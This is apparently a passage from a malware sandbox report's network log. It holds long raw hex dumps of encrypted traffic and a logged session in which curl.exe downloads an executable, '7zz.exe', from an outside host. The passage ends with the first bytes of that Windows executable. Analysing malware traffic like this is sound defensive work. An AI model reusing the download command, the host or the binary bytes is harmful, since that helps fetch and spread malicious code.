                                                                                                                                  2023-07-18 15:37:07 UTC1984INData Raw: 7d c7 0a 94 d4 22 86 e3 92 42 ad 77 ef 3b 85 4e 24 b4 28 91 ae 46 e2 68 74 50 d8 df 62 db c8 0d 8d 73 99 86 92 86 b8 86 e9 a1 c9 a4 e0 ec ff 29 4e 0f d3 26 69 83 3c 79 f8 e2 85 14 9a 65 83 db 46 16 51 35 72 f3 14 65 9a fb b1 7e e8 c8 93 e3 58 5b 0a 6d 2a 61 80 1c 7b b7 b6 7f 4a f6 55 53 b2 93 da d9 a9 f4 14 54 a9 40 14 5f 35 d9 dc f5 eb ba d9 be 20 77 60 21 3c 85 1c 04 a8 42 08 88 cb 26 9d fa 34 6d a8 da 61 67 91 3f 50 2a b2 9c 63 93 6f cf 27 b5 d5 d3 8b 76 83 de ff 0b a7 58 78 9d f1 a5 3a d0 a5 05 ec fe 64 e9 5f 48 89 8e 6b 31 5f 48 8e 63 79 e7 62 66 24 f5 78 f2 01 d6 61 b8 25 84 42 60 12 12 01 76 b8 29 3e 30 0a 2b 99 2b ed 71 bb f3 84 b1 2e a3 ed fc 8e 92 ec 0c dc e8 2c e5 4d d9 9c 7f 40 5b 5d 13 bf 93 2f a4 db 6e 14 a6 0a fb ac 89 13 7d 26 7b b9 a5 02
                                                                                                                                  Data Ascii: }"Bw;N$(FhtPbs)N&i<yeFQ5re~X[m*a{JUST@_5 w`!<B&4mag?P*co'vXx:d_Hk1_Hcybf$xa%B`v)>0++q.,M@[]/n}&{
                                                                                                                                  2023-07-18 15:37:07 UTC2000INData Raw: 48 88 bd b8 95 e7 f5 62 9f 0c ad d4 10 b2 c8 22 25 f8 7c 30 2b b5 20 83 31 08 59 88 91 1a 4b 4b f4 d1 84 24 9b 90 22 97 24 7e 05 28 bd 14 e4 92 a7 e7 00 6a 06 12 62 a0 a0 c2 7e fc 1c b1 28 fc 2e 50 2b c2 c8 33 7c 1d 99 22 7c 7e ef e8 3f 2b ea 37 55 11 e7 b8 ca 01 dd 67 5d 01 f8 2e ab 70 e0 e1 28 c6 d6 85 a4 43 00 5a a5 94 0d 07 0f be 1a 4c aa a0 58 80 85 49 f0 e0 42 f1 4f 7e 5c 17 99 ef bd fe ea 9a 2c 07 bf 51 42 ff bb 28 6b ae ac 40 c3 80 bf bb b2 6a 4a 61 e3 06 fa a2 1f 6e 54 87 ac 02 30 84 55 c1 b6 10 dc cb e5 e0 80 75 f3 ff bf 1a 00 02 ba 09 a5 07 b0 0e dc 1c aa 7b 87 83 f2 01 59 ce c8 08 08 19 4e 80 b2 06 d5 ab 0d 29 fb 52 52 aa 75 8b bc e6 bb 36 1b 5e f3 2a 7d ed bf 4c 43 48 56 0b 74 06 05 84 0b 52 a0 de fe 2f fc 3a 8e 01 24 a8 09 8a 02 ae 00 7a 6b
                                                                                                                                  Data Ascii: Hb"%|0+ 1YKK$"$~(jb~(.P+3|"|~?+7Ug].p(CZLXIBO~\,QB(k@jJanT0Uu{YN)RRu6^*}LCHVtR/:$zk
                                                                                                                                  2023-07-18 15:37:07 UTC2016INData Raw: 8d 2f e6 49 9b 04 ff a9 87 f2 e0 6c ff 88 27 cc 9e c5 16 13 67 e6 00 f8 bd 4f 27 76 33 45 10 1d 10 b3 a1 0d 1d 5a 5d d3 f2 4f aa 79 53 a4 18 13 9c 48 cf 4c 4c 96 86 ad 9c bf 2d 7c d1 5b eb fb 5e 4d 77 95 70 f3 a3 a6 cf be 0f 6b 12 8a 84 e1 95 5b c2 6b c0 4e d6 ef cf b9 c0 2b d7 c3 ac 34 c3 52 b3 12 02 98 70 f9 31 60 fc 97 cd e8 a7 29 d5 48 fa 42 bb d3 d5 1b b9 97 49 7e cf 18 a3 5a 7e 3c 2b 0f 9d 07 c2 15 b4 3f bf 73 a2 34 9c cb 5b 09 8a 03 2a cf e9 7b 1b 6a 87 c8 22 be 75 6a 57 61 fe 71 4b 7c a0 3f 46 2c f5 a3 22 b6 f3 6f 0c e8 b6 37 22 e5 13 37 19 6a 1f 6d 6f 98 da 81 51 83 9c a5 5f 1c d8 8d 4c d7 3e 9f 7f b9 7a 83 1d 9b 04 18 f6 ba b9 f5 2e 62 70 12 92 d8 d5 03 bc 62 5b 2b 24 f9 f7 a0 f8 f8 17 37 74 bf 41 a6 4b d1 ca ac ce 7b 51 c0 37 98 a7 2c c2 04 43
                                                                                                                                  Data Ascii: /Il'gO'v3EZ]OySHLL-|[^Mwpk[kN+4Rp1`)HBI~Z~<+?s4[*{j"ujWaqK|?F,"o7"7jmoQ_L>z.bpb[+$7tAK{Q7,C
                                                                                                                                  2023-07-18 15:37:07 UTC2032INData Raw: d4 81 ee 68 4e 24 ae 63 f0 5a 69 12 c5 bb 81 74 1d aa ac 93 40 65 ec 43 bf d8 ac ca 4b c1 ca fa 20 7f dd 74 c6 6b 87 c9 c8 ee 16 3f 1d c3 e2 c2 57 4e 3e aa 3c fb fb 25 14 28 7f ad ca 4e a3 55 58 10 bf 33 55 54 62 15 e4 9c 6d 0b 2b a7 a5 db 8f eb 3c 92 4d 3f 27 2e f5 65 da 95 13 ad be 21 44 82 7a fe ce ad e7 b8 e9 b8 43 68 9d 33 3f cf ef ec 0e 9f 37 90 8c 79 3f 7b ca c7 73 0e 7c 9b 08 7f b5 16 e9 b1 8e 6f ab 01 f3 0d da 5c da f3 12 8a 2a 4e 90 0f d2 a0 1e 56 0e ca 92 8d b2 2d 3c a6 35 40 45 dd a3 7b 5b 02 b9 fc 67 c1 fb 41 3b 8f f2 fe 1a 6c 36 71 1b a0 eb f4 93 fb e0 8e bd 41 b3 78 1b 3f 77 33 51 87 6f 26 62 5f 11 6e fa 57 07 3e 55 6d 60 76 f6 09 52 4b d9 d3 42 4c 52 0f 9a 2e 1b 92 34 7e 6d 5e 5e 27 e4 98 7d d0 b5 3f 96 59 8c 10 f9 05 e5 76 a7 ce f0 6e cb
                                                                                                                                  Data Ascii: hN$cZit@eCK tk?WN><%(NUX3UTbm+<M?'.e!DzCh3?7y?{s|o\*NV-<5@E{[gA;l6qAx?w3Qo&b_nW>Um`vRKBLR.4~m^^'}?Yvn
                                                                                                                                  2023-07-18 15:37:07 UTC2048INData Raw: f3 2f 1c 9f 6a 75 7f bb b8 7e 62 0a 73 86 2e c6 6a 0e a1 2b 37 7c 80 0e dd fb ce 23 92 88 b1 45 e0 6d c5 c8 9f a6 e0 bc 7b 94 65 ec 50 0e 7f e5 04 be b8 bb f6 37 c1 92 20 4b 80 4b 7d 77 e0 af 03 22 c8 51 94 a1 97 c5 cb 18 9f c2 8e a0 60 05 4e fc 85 aa e7 cc 00 d5 89 fc 01 c4 22 4f cf d5 70 9d 7a 24 20 1a f7 9c 8c 56 e4 5a 49 21 ab 20 2a d2 a2 85 58 ba 35 d7 02 fa c5 bb 55 a8 0a 48 5d 2a c3 b2 c3 10 66 04 65 15 b4 fd 7c 30 23 a8 a6 ee 73 a7 b0 05 d2 70 e9 85 44 28 95 1a dd a0 58 22 2c a7 c6 73 0f 35 2c 29 bc 73 79 6a ac bd dc f9 02 aa 07 dd 0d ba 5e 47 a5 9d ca f9 b7 1b 94 d7 32 87 68 50 9b 88 db 43 d6 02 ce 37 2d 86 54 44 2b ef b7 4f e0 75 b8 7f bf a1 8a f8 b3 18 50 58 a3 b0 1b 82 85 2b 0c 33 58 6e 70 15 63 95 62 23 5c 35 80 d7 37 de ab 0c 5f 48 4e aa 90
                                                                                                                                  Data Ascii: /ju~bs.j+7|#Em{eP7 KK}w"Q`N"Opz$ VZI! *X5UH]*fe|0#spD(X",s5,)syj^G2hPC7-TD+OuPX+3Xnpcb#\57_HN
                                                                                                                                  2023-07-18 15:37:07 UTC2064INData Raw: 21 af 8a 6e 5f 20 b6 b4 6b 36 40 e3 ae a5 94 c5 56 71 6a af 46 fd d6 a6 91 1e 70 0e 19 02 8a 03 e1 54 c5 59 b3 5b bd 8d ac 3e 34 78 33 6a d8 d5 db 14 4e 10 ab 0e 95 40 52 f6 86 ce 7a b8 d9 dd 9b 41 ec e1 d2 bd bc f4 d2 5e 26 4d 86 e9 a8 b5 96 5f 97 1c c9 2d 68 4c 02 b5 a9 f8 75 18 ae 82 c9 07 f6 f1 b3 fc 72 83 b5 fc 32 87 fe fc 26 a3 90 50 04 a4 0c 58 3d a2 9e e2 13 7c ab da 4e ac b6 87 ed 04 04 6b e8 72 06 c1 5b 2e c9 17 04 e7 ff 39 ac 9f cc 48 7a 48 11 3d 61 04 62 5b 14 f3 26 a8 5c 42 bb 38 c3 2e bf d4 f3 96 42 b1 c9 ba 29 39 5f c2 02 7f 9c 20 aa 84 5d 0d fa be 46 9d 35 09 77 d9 0e c2 28 7d 3b b9 bb eb 53 f0 24 e2 34 b2 8f f3 5a 09 9f 08 53 3c 04 a2 11 bd b5 e6 9c 95 ca 51 9d 5e 52 8e 93 81 77 05 dc 71 0d c6 94 0b 1b 48 5a b5 be f7 5c 87 9d 11 97 5e 45
                                                                                                                                  Data Ascii: !n_ k6@VqjFpTY[>4x3jN@RzA^&M_-hLur2&PX=|Nkr[.9HzH=ab[&\B8.B)9_ ]F5w(};S$4ZS<Q^RwqHZ\^E
                                                                                                                                  2023-07-18 15:37:07 UTC2080INData Raw: d0 db 1a 81 45 82 9a 2d 0c 31 09 2c 9a 69 c2 c3 d2 b6 18 ff 36 eb 1a c3 9e 25 de be 8f 0c 6a 79 6c 3f 4b 28 b1 51 17 fc c3 29 91 4f 6d 9d 82 63 89 88 9e ef 65 d8 37 05 b5 02 66 1d cd 7f 68 aa 25 41 2b 70 7e 73 7f 9b fa 65 41 76 b4 2f 0d 46 65 a4 7e 31 73 b3 6a 97 c8 a5 3a 81 4c 84 8f 74 e3 b6 a1 06 d8 8c 8a e5 ad 8e 51 37 5b 25 5f c2 47 35 00 a5 19 ef f7 fb 10 35 96 2a a1 db 2c 6d 76 42 e9 7f 0c 94 ae 58 c1 1c d0 50 4c fa 4a 73 8e b6 ee 34 43 c9 c0 a5 2c 74 99 80 46 1c 77 df 80 8d 99 a9 35 93 dd c7 d6 d7 25 c0 96 7d 00 a2 48 e0 5c d4 61 b0 54 f8 36 e0 e3 43 37 b4 f2 69 91 9c 6e 69 39 7e 58 ac d5 18 48 23 2f 80 31 50 04 d5 04 9c 4a 57 00 90 c4 18 a3 2b 86 20 16 b2 8c 79 05 f4 9a 58 16 20 cd a5 58 2d 9e c3 f4 7a da 11 cf 09 83 e1 95 82 6e 77 b1 0e f0 24 48
                                                                                                                                  Data Ascii: E-1,i6%jyl?K(Q)Omce7fh%A+p~seAv/Fe~1sj:LtQ7[%_G55*,mvBXPLJs4C,tFw5%}H\aT6C7ini9~XH#/1PJW+ yX X-znw$H
                                                                                                                                  2023-07-18 15:37:07 UTC2096INData Raw: de 0a 21 8c a6 52 cb 62 b6 0f 44 14 da 00 6c 43 5c 9f 4e 48 c1 d2 ec 75 6a a6 00 34 26 ed 14 7b 91 77 15 ac af d1 2b 6c 6a dc 1a d2 44 44 ab 13 da bc 8b 37 f1 89 3b 64 3e 35 ce 2f dc 1c 40 14 54 c6 9d 05 15 0c 6b 60 db a4 37 42 71 d4 dd 5e 73 70 b4 14 0a cf 35 d0 4a 8b 36 78 59 3f 15 ae 2a 9e 0c 46 fe 63 60 3e e9 4a bb 65 0c 6e 1c bc 47 c5 64 97 24 21 c7 55 88 6c 03 cb b3 d3 a2 0c 59 48 8a 69 4c da 23 4c cb 52 c8 52 98 64 f2 51 47 09 e6 31 db a6 2d 14 e6 55 db 18 50 0b 8c 7f c1 53 90 ed 42 0c e4 09 67 5b e1 0f a0 22 a4 98 36 49 11 48 4c 9f 79 a2 0d 22 9f b7 dc ba 65 6e 55 be e1 3f 12 f4 75 55 de 8c e0 3d 5a b4 6e f1 da 61 c7 75 84 10 04 e5 7d 7f fc ba a8 0b a1 d7 69 27 61 cb 6a df d5 1a 20 cb 3f d7 d2 50 a9 5f 15 8b ef 2a bd 4b 16 f3 3c 25 e9 c7 13 f4 73
                                                                                                                                  Data Ascii: !RbDlC\NHuj4&{w+ljDD7;d>5/@Tk`7Bq^sp5J6xY?*Fc`>JenGd$!UlYHiL#LRRdQG1-UPSBg["6IHLy"enU?uU=Znau}i'aj ?P_*K<%s
                                                                                                                                  2023-07-18 15:37:07 UTC2112INData Raw: 93 5b ee e1 11 bd a8 85 6b ec da fc a5 14 44 3f f7 15 ab 29 e5 6c d8 26 bb fa 23 94 0d 88 cc d2 93 bb c8 fe c9 72 75 27 5d 67 ed 6f da ed ec 54 0f ae 06 77 77 21 e5 38 9c 94 49 b6 5f 04 0e 0c 60 42 e2 b9 a7 ff ff f6 15 6d f7 17 85 fc 17 3c be a4 08 9d e3 75 26 25 2c c9 65 b0 39 d2 81 cb 4c 6d 76 57 e7 4c 73 fd 74 9d 35 fa 67 e0 ed 34 8e 7c 05 9c dc 87 74 fb 74 94 4d 5b f9 c6 d1 66 b9 8a e4 a3 f6 26 9c 8b 69 75 b1 5b c4 b2 81 e3 57 20 a3 38 ec 2c 9d 18 3f a7 e7 a2 c3 ff c0 7f 9d e3 8d 5a c8 8d 5f 01 c0 c8 39 f2 da d7 0e ee 6e 32 4d 5d 7d fb 68 9a c2 54 0c a5 0f 86 6b 9d 52 32 6f 34 65 2f 9b 57 87 70 5b 42 69 6a b4 18 f4 f8 0a 09 39 29 73 3b d4 e7 50 28 0a 79 43 41 98 22 32 f2 01 00 a0 95 72 78 9e 11 98 2e f7 ff 8c 92 d6 a0 4c 24 d9 7e 4a 41 a2 4f 16 63 34
                                                                                                                                  Data Ascii: [kD?)l&#ru']goTww!8I_`Bm<u&%,e9LmvWLst5g4|ttM[f&iu[W 8,?Z_9n2M]}hTkR2o4e/Wp[Bij9)s;P(yCA"2rx.L$~JAOc4
                                                                                                                                  2023-07-18 15:37:07 UTC2128INData Raw: 7a 31 1a a3 fe e3 e3 d9 ac 57 5e 66 37 35 65 e1 e8 f4 b0 cf c2 83 fe dd 44 3d f9 8c 88 de e0 5a 10 bc 80 bc 9d cd 0b d2 c5 8e 7b 15 83 5d 25 fe 55 8c 24 54 9d fd 32 08 49 44 2f e2 b8 ec 50 62 f0 e9 f8 23 97 c9 72 fa d4 db 85 c3 3d 53 65 3a 7c 2b 8d 21 21 ca 53 3a 9b a1 83 9c ec fd 7b 1c cc a7 d4 c1 b9 fc 19 17 55 0b 8f a6 20 fe 60 1c 93 3e 01 7d fe 90 4f 7f b1 08 24 6e d0 7c a9 01 49 81 fa d5 5b 94 3f 88 a0 8d fe b1 a5 2e a1 d4 a2 22 65 b1 46 e7 ec 33 c5 f5 01 ff 9b ed f8 7e 65 dc 1b e0 91 a3 3e 35 db ce ba b5 4c 8c aa e7 8e 9e 1b ab aa 44 f1 97 42 13 85 54 f8 a6 f4 84 bb 5a 96 a2 31 55 90 08 9a 2e c9 2f 31 73 4f 52 6f ba 0b fa 0b bf d0 75 ad 2d 80 57 45 e5 9a cc 32 85 63 9d 56 42 f1 54 a6 ae b6 b3 65 f9 fb 24 e9 5e a8 4a 37 f1 0b 4e 6b e4 4f df 42 21 bb
                                                                                                                                  Data Ascii: z1W^f75eD=Z{]%U$T2ID/Pb#r=Se:|+!!S:{U `>}O$n|I[?."eF3~e>5LDBTZ1U./1sORou-WE2cVBTe$^J7NkOB!
                                                                                                                                  2023-07-18 15:37:07 UTC2144INData Raw: 51 f4 2d a3 74 84 45 06 a7 56 4e 84 46 09 19 f0 bc b8 24 c9 1b f4 49 ef 48 78 e4 ce 12 4e 90 1f 07 23 05 fb ea bf 7d 7d 67 e7 be 3e b6 83 4f 4a eb 7a 49 d9 7b b7 60 7b b2 09 e9 49 19 b7 50 34 72 c7 28 f7 6e 3d d2 52 01 1f 19 8e be df 92 6c b1 6f 47 bd e3 25 3a 02 65 9a 93 4f d9 7f 8a c3 f5 c8 de b6 fb f1 7c e3 df 96 8f 93 92 51 e0 1f 7d c0 27 94 96 93 e3 8e d4 4b ca 0d 73 c9 e1 c8 4a 58 b1 49 ca d3 4a de 88 49 4a 86 cf 34 9e 53 d2 e0 ab eb 72 23 81 a2 f4 10 9f b2 55 90 57 e2 be 4a e1 aa c8 48 47 c7 48 a6 6f 52 dd 81 73 9f ca e8 37 a6 09 cd 0d 94 de d8 b6 bd 41 cc 20 c8 0d df 70 34 30 c1 7e 34 b4 68 22 09 3c bf 49 26 d0 e2 91 47 da a6 d9 f1 b7 85 27 0d f5 f2 08 de 7a af 1f 00 7b 2b b1 9f 43 b6 8c 88 f7 23 d8 97 01 bf 99 a6 a8 81 ff 53 72 82 a0 1a 74 c5 6a
                                                                                                                                  Data Ascii: Q-tEVNF$IHxN#}}g>OJzI{`{IP4r(n=RloG%:eO|Q}'KsJXIJIJ4Sr#UWJHGHoRs7A p40~4h"<I&G'z{+C#Srtj
                                                                                                                                  2023-07-18 15:37:07 UTC2160INData Raw: bc 14 3c bc 14 b8 5c 08 88 0e 14 ec c9 bb 27 c9 8c 81 8d 6d 94 cc 9e e3 1f 9f a1 c5 2c ec 9b 4a 6a 13 cc 6d dc de 3a e4 12 d6 21 0c 85 09 19 17 51 fb 86 28 10 f4 7d ed bf 61 68 4a fe ee 53 71 24 42 01 95 dc d7 23 e3 5c 4d 78 a9 b4 6a e7 a8 60 22 5e 3f 14 0f 1f 12 5d 48 7e b1 6e b6 12 d1 79 93 26 5b ff 30 de f1 a5 e3 b2 da 54 8e 77 f6 57 ff ca 8e 95 87 4f 1a 17 fc 00 79 a9 80 a4 f2 16 c9 a0 32 5a b4 de f9 b7 7e 6e aa 20 c7 4a ec 06 51 f9 f1 be 9f 4f c4 b7 5f 4a 24 9b 52 ad f8 00 5a 32 9f 40 89 f6 6d 2e 79 d2 b7 cf 4e bb 7b c2 46 4f 66 10 dc f7 5e 9f da 64 61 eb dc 6c 65 43 90 b9 8e 81 fb 8a 81 4c b5 f0 73 76 34 e0 0a 9f 04 cc 32 bb 04 52 98 01 2d d4 84 f5 c4 01 4c 4d 82 66 9d 64 65 be be d4 23 a1 68 f3 d4 f9 d6 04 cf 52 6c 9c a9 3b 0f 70 ae 67 a7 f2 c5 27
                                                                                                                                  Data Ascii: <\'m,Jjm:!Q(}ahJSq$B#\Mxj`"^?]H~ny&[0TwWOy2Z~n JQO_J$RZ2@m.yN{FOf^daleCLsv42R-LMfde#hRl;pg'
                                                                                                                                  2023-07-18 15:37:07 UTC2176INData Raw: a7 dc bc 61 30 3c 4d 76 a0 20 ce d8 68 8c 83 b3 2b c2 b1 67 cf fa d7 c9 13 27 74 6c c5 7e 4a f0 dc 51 f8 ab 9f 31 bf be fa a1 eb b9 46 9a b7 74 52 3d 69 f4 d5 07 d6 66 5d 62 78 c6 49 31 76 24 3f e8 60 0a e4 a9 39 de 58 2a ae 79 96 5d 63 fe 9d 29 96 2e 66 dd e8 f3 99 8a fb 94 52 0d 94 51 ed 81 56 35 23 fe f2 e9 fe da 0b 97 ca 48 f2 dd fd 73 3f 41 9d 45 10 78 5d cc df 7b c4 aa 40 b3 e4 f3 c8 4c ba f1 06 5a 97 c6 36 2d b2 f2 d0 41 c2 23 93 8c 44 8b 12 2f 2c 89 89 dd 37 8a 52 cc 9f f5 02 6f 64 d0 ba 21 40 2f f3 9a 7e 9b e8 2d c2 dc 76 3a 9c 63 6d 3e 4e 4b bf 14 9d ca 66 15 e2 8f fb eb 11 d9 64 f7 ea 0f cf 12 6f 15 81 0f e2 78 0e 7b ef 5f c9 bf 9e 99 95 2b 4d c7 26 f5 75 c6 71 64 97 9d 0b 8f 29 46 3e a8 89 42 2e 65 1b b9 4f ab af aa a4 b1 57 c5 c9 87 41 00 d4
                                                                                                                                  Data Ascii: a0<Mv h+g'tl~JQ1FtR=if]bxI1v$?`9X*y]c).fRQV5#Hs?AEx]{@LZ6-A#D/,7Rod!@/~-v:cm>NKfdox{_+M&uqd)F>B.eOWA
                                                                                                                                  2023-07-18 15:37:07 UTC2192INData Raw: a8 8f e3 5b b7 12 35 6d f7 55 c3 a8 c4 03 0d 6b 2a 31 a6 7f 97 99 47 88 5b e9 ad e8 ec 86 b7 8c bd 3a 7d 8e 83 38 bc 86 7b 20 9e 74 42 9d f1 f8 b1 10 75 ff 2d bc 9c b9 61 32 9a 07 13 9a fb 6d 11 f6 5c fb db 37 76 fd 03 1f 4f 0c 4c b2 35 f1 b7 bd f1 ef bb 73 6e 05 fe 40 17 d9 13 da 59 35 4e 77 6e 34 6d ab 82 2d ed 47 6b 35 1a a3 fa 2c d7 ff d7 52 63 a5 44 db 9c d1 e2 65 bc c3 69 6f 85 ea 98 92 56 c1 91 f8 15 6c 00 6c 10 10 04 00 00 00 33 53 43 33 00 00 0f 54 e0 b1 3f dc 8e 00 d2 64 90 7c e2 20 61 f6 3c 07 49 cb c2 14 b8 69 88 1b 1f 8f cb 89 6c 37 89 92 6e bb 6e 9b e0 c8 25 e1 ef df c8 fc 01 00 8d 0c 5c 11 01 00 30 9c c1 c0 d3 f8 30 30 ca 9f c4 e7 7c 86 f1 39 8e 4f 21 d7 b6 0b e1 d9 62 8c 26 5b 6d 1a 7f 8b c6 0c 16 4f 1f e3 b1 1a 75 9c 1f b7 b0 1a 6e 9c 9e
                                                                                                                                  Data Ascii: [5mUk*1G[:}8{ tBu-a2m\7vOL5sn@Y5Nwn4m-Gk5,RcDeioVll3SC3T?d| a<Iil7nn%\000|9O!b&[mOun
                                                                                                                                  2023-07-18 15:37:07 UTC2208INData Raw: c9 15 1a 15 6a 54 e1 bc f2 58 ea b1 ea c5 85 80 f9 da aa 3d 82 b6 62 bb 65 bb c5 6d 0a 64 2b c8 95 b3 2b 91 ae 22 56 d6 ac 48 b7 92 a3 a2 8e 8a 06 57 79 54 ea 51 8a e1 95 c9 57 93 56 10 ac 50 bc a2 59 39 b2 52 e3 aa 90 4a 43 2a 3b f0 99 fe ea 1f 8a e4 f9 b9 d7 dd 59 eb 48 6f 53 cb f2 3f 2e 13 a1 ed e5 b2 d5 65 15 b6 54 24 b6 92 a4 f2 93 ca e5 57 7f ca a5 a9 9e 29 cf 7f 6f f6 db 5f d6 b7 4a a5 07 95 b6 25 cc 0f fe 42 a5 f4 9d bf a9 a5 e9 9f 5e 2f 5f 82 a5 ce 9e e9 62 a7 79 cc 8f 39 8a a1 53 fa 4c 1e b8 c2 a6 f2 99 4a 34 57 64 56 ca ac d2 b9 45 b3 95 66 fa b2 21 b8 fc 66 da 9c c2 b6 8a a6 56 9a 57 de 57 6e ad 6e ae c8 ae e0 5b e1 5d b1 5d c9 bf ca 6f 2e 86 fa a1 9b 1e 54 ec ef 66 fd d7 fa e9 75 d5 1d fd 33 88 70 1d f4 9d df 6a 77 e5 f0 9f 77 5d ce d0 e7 1c
                                                                                                                                  Data Ascii: jTX=bemd++"VHWyTQWVPY9RJC*;YHoS?.eT$W)o_J%B^/_by9SLJ4WdVEf!fVWWnn[]]o.Tfu3pjww]
                                                                                                                                  2023-07-18 15:37:07 UTC2224INData Raw: 80 fb d1 9f 97 73 9f 16 99 e9 9b 1e f1 54 94 c9 aa a3 65 ee cf 59 ca 23 6e ea 7d 24 54 3f 7d 4c 3a 49 a0 28 2e c5 a4 3f cc 8b fd 65 be 0a a1 59 74 28 13 08 50 21 84 22 bf d0 ec 2c 36 80 ea d4 6d a6 ae 17 b2 34 c1 97 0a f0 22 84 ac 21 f1 6b 85 35 4e 1f ba 1a fd 86 98 27 7d 83 4d 11 85 1b d2 67 99 97 4c 60 6a a1 0a f7 51 e0 f4 ef 07 56 24 d5 fc fc 90 78 0b 59 dc af 84 1a 65 66 a4 32 9c 6c bd ac bb 1b c1 c9 df 43 18 db 07 70 2f 23 0a f7 6b d7 0d c6 69 e6 5e 80 e6 ea 7e 21 27 db ef 0e 5d 93 65 8d 07 1c 3d 2f f9 88 10 ef 02 3c b6 ac 2e 8a 6f 62 74 16 de 3b db 59 e3 30 8c 4f 57 bc 29 96 5f 7e 1f 9d 4c e8 75 01 f0 b6 b0 d7 4b ef 9b eb 92 cc 80 19 f0 2c 32 a1 cc 72 31 6e 8c 18 1a 87 39 c4 8b 30 c3 4a 9c 75 3f c0 ff 9d 81 4d fc d2 5e 8a 12 bd ee bc 75 5b dd 66 6d
                                                                                                                                  Data Ascii: sTeY#n}$T?}L:I(.?eYt(P!",6m4"!k5N'}MgL`jQV$xYef2lCp/#ki^~!']e=/<.obt;Y0OW)_~LuK,2r1n90Ju?M^u[fm
                                                                                                                                  2023-07-18 15:37:07 UTC2240INData Raw: c3 52 6b b3 02 84 38 44 71 0d 92 96 a5 b7 37 11 66 36 45 53 80 e8 71 61 ad ef 34 5a 13 86 44 fd 7e f4 a7 03 35 d2 ff d8 20 4a 0b 3c 98 ff 3d 24 a5 e2 05 9c 27 25 e5 b7 fd d7 8d bc 9f c7 f1 30 b1 e4 b6 29 17 e5 c1 db 3e 93 a7 56 f5 4c 51 6a 9e e5 21 36 a0 66 8b 84 53 51 54 9d 99 d3 22 85 34 d3 a5 67 70 ef a9 5a 43 4f a7 61 b6 37 ff a8 0e cb 29 89 75 4f 06 ad 2c 66 77 b8 cf f2 9a 34 21 3a dd 0f 5a f9 57 44 a0 85 22 81 77 70 c3 13 1b c6 a6 af 40 b6 7f 56 f1 c6 b2 3b f6 b5 19 c8 7b ef e7 fe 19 e1 5c 8b 43 14 e2 60 da fd 09 f9 87 10 eb c8 93 36 0e 71 73 0d 7c ce df 3c 1f d7 c9 c3 3b 74 c9 fe 43 fb 4e 8a d9 3d f1 87 9a a3 97 b0 1a 44 5d b2 a6 f6 93 49 39 26 89 05 5a f1 09 56 26 c8 a1 e9 34 bd b7 8b d5 43 ca 9f a2 db 75 7e 4e 4e ae cb bc 10 23 0f 6c 0d 5f 09 60
                                                                                                                                  Data Ascii: Rk8Dq7f6ESqa4ZD~5 J<=$'%0)>VLQj!6fSQT"4gpZCOa7)uO,fw4!:ZWD"wp@V;{\C`6qs|<;tCN=D]I9&ZV&4Cu~NN#l_`


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  1192.168.2.549721188.127.225.160443C:\Windows\System32\curl.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2023-07-18 15:37:08 UTC2252OUTGET /05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe HTTP/1.1
                                                                                                                                  Host: ponraj.com
                                                                                                                                  User-Agent: curl/7.55.1
                                                                                                                                  Accept: */*
                                                                                                                                  2023-07-18 15:37:08 UTC2252INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                  Date: Tue, 18 Jul 2023 15:37:08 GMT
                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                  Content-Length: 587776
                                                                                                                                  Connection: close
                                                                                                                                  Last-Modified: Mon, 10 Jul 2023 18:02:03 GMT
                                                                                                                                  ETag: "8f800-60025c7a4b2d6"
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  2023-07-18 15:37:08 UTC2252INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7d 11 72 52 39 70 1c 01 39 70 1c 01 39 70 1c 01 42 6c 10 01 3b 70 1c 01 ba 6c 12 01 20 70 1c 01 0f 56 16 01 5b 70 1c 01 b7 78 43 01 38 70 1c 01 39 70 1d 01 96 70 1c 01 ba 78 41 01 3e 70 1c 01 0f 56 17 01 84 70 1c 01 56 06 b6 01 19 70 1c 01 56 06 82 01 3b 70 1c 01 fe 76 1a 01 38 70 1c 01 52 69 63 68 39 70 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05
                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$}rR9p9p9pBl;pl pV[pxC8p9ppxA>pVpVpV;pv8pRich9pPEL
                                                                                                                                  2023-07-18 15:37:08 UTC2268INData Raw: 3b 00 00 f6 44 24 08 01 74 07 56 e8 16 2f 00 00 59 8b c6 5e c2 04 00 b8 9c 30 47 00 e8 7d 6d 06 00 83 ec 10 53 56 57 8b f9 33 f6 8b da 6a 03 8d 4d e4 89 75 f0 89 75 e4 89 75 e8 89 75 ec e8 65 d3 ff ff 8d 55 e4 8b cb 89 75 fc e8 a5 4b 00 00 8d 45 e4 8b cf 50 e8 73 ee ff ff ff 75 e4 e8 c3 2e 00 00 59 8b c7 8b 4d f4 5f 5e 5b 64 89 0d 00 00 00 00 c9 c3 53 56 8b f1 33 db 6a 03 8d 4e 10 88 1e 88 5e 01 88 5e 02 88 5e 03 88 5e 04 89 5e 08 89 5e 0c 89 19 89 59 04 89 59 08 e8 07 d3 ff ff 89 5e 20 89 5e 24 89 5e 28 c7 46 2c 04 00 00 00 c7 46 1c 78 a6 47 00 8b c6 5e 5b c3 b8 be 30 47 00 e8 d7 6c 06 00 51 56 8b f1 57 33 ff 8d 4e 04 89 3e 6a 03 89 75 f0 89 39 89 79 04 89 79 08 e8 c3 d2 ff ff 8d 4e 10 6a 03 89 7d fc 89 39 89 79 04 89 79 08 e8 ae d2 ff ff 8d 4e 1c 6a 03
